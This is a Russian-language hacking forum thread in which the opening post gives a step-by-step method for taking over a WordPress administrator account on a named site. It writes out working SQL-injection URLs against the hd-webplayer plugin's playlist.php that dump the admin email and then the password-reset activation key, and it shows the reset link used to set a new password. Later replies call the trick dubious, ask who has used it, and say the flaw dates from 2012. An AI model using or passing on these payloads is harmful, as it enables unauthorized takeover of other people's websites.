Перейти к содержимому













Фотография
Скачать

Получаем доступ в админку Wordpress без расшифровки хэша



  • Авторизуйтесь для ответа в теме
Сообщений в теме: 4

#1 Slader

Slader
  • Сливапер LVL 5
  • Сообщений: 56
  • Регистрация: 31.08.2014
  • Заработано: 2 руб.
Репутация: 159

Награды: 12

  
  
  
  
  
  
  
  

Отправлено 31 Август 2014 - 17:36

Получаем доступ в админку Wordpress без расшифровки хэша
 

Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
Но я понял как входить в панель без ожидания расшифровки хэша.

Покажу на примере.
У нас есть блог, где мы уже вывели данные из таблицы wp_users.
Торопится выводить пароль не стоит, выведем e-mail администратора:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--

И результат запроса:

admin:[email protected]

Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

Вводим e-mail администратора который мы получили выше, и отправляем письмо.

Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
Делаем такой запрос:

http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--

И в результате мы получаем активационный код:

P6rd7g1bPW28zgbPCRtZ

Теперь идем на страницу сброса пароля (При этом заполнив параметры):

www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin

И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

Далее привычная авторизация.

Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().

 


  • -1

#2 Жорж

Жорж
  • Сливапер LVL 4
  • Сообщений: 216
  • Регистрация: 08.07.2014
  • Заработано: 2 руб.
Репутация: 57

Награды: 16

  
  
  
  
  
  
  
  

Отправлено 31 Август 2014 - 19:37

Мутная хрень какая-то!


  • 0

#3 PayLieDie

PayLieDie
  • Gold
  • Сообщений: 277
  • Регистрация: 08.06.2014
  • Заработано: 152 руб.
Репутация: 292

Награды: 18

  
  
  
  
  
  
  
  

Отправлено 31 Август 2014 - 23:49

Плагины кривые не ставьте и держите актуальную версию, и никакая мутная хрень не залезет в админку


  • 2

#4 Армян

Армян

    Заблокированный

  • Заблокированные
  • Сообщений: 106
  • Регистрация: 30.07.2014
  • Заработано: 0 руб.
Репутация: 87

Награды: 9

  
  
  
  
  
  
  
  

Отправлено 09 Декабрь 2014 - 15:02

оставьте отзыв, кто пользовался?? 


  • 1

#5 bing

bing
  • Platinum
  • Сообщений: 97
  • Регистрация: 20.10.2014
  • Заработано: 5 руб.
Репутация: 29

Награды: 17

  
  
  
  
  
  
  
  

Отправлено 15 Декабрь 2014 - 18:46

это старая уязвимость в плагине  hd-webplayer  ещё от 22 сентября 2012

на сегодняшний день врядли остались уязвимые WP


  • 0



Похожие темы Collapse

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

×

Зарегистрируйся моментально!